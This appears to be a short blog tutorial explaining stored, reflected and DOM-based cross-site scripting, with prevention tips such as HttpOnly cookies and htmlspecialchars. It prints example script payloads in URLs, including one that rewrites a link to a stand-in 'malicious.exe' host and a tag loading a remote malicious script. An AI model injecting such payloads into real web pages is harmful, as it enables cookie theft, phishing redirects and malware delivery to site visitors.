Description
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls.
there is 3 type of XSS attack : Stored, Reflected, and DOM-Based.
1. Stored XSS
this type the script stored into database, the common attack via URL or Form .
there is 3 type of XSS attack : Stored, Reflected, and DOM-Based.
1. Stored XSS
this type the script stored into database, the common attack via URL or Form .
for example display cookie , injected via Form
2. Reflected XSS
this type attack where script not stored in database but direct in client html, typically attack via URL and distribute using link,
here's for example http://example.com/index.php?user=<script>alert(123)</script>
3. DOM-Based XSS
this type attack modified DOM element on client html , of course this attack maybe reflected or stored xss. here's for example :
http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a");AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script>
but these day typical attack just include source javascript from CDN <script type="text/javascript" src="www.somecdnnetwork.com/maliciousscript.js"></script>
of course with calling that file the attacker can do many things such as dom manipulation , redirect to phising site or steal cookie.
How To Prevent XSS
1. Use Httponly for prevent stealing cookie.
2. Always filter every input parameter (including html char , hexadecimal, base64 dll) .
Syntax : htmlspecialchars() or strip_tags()
strip_tagshtmlspecialchars
Post a Comment
Harap gunakan bahasa yang baik dan sopan, terima kasih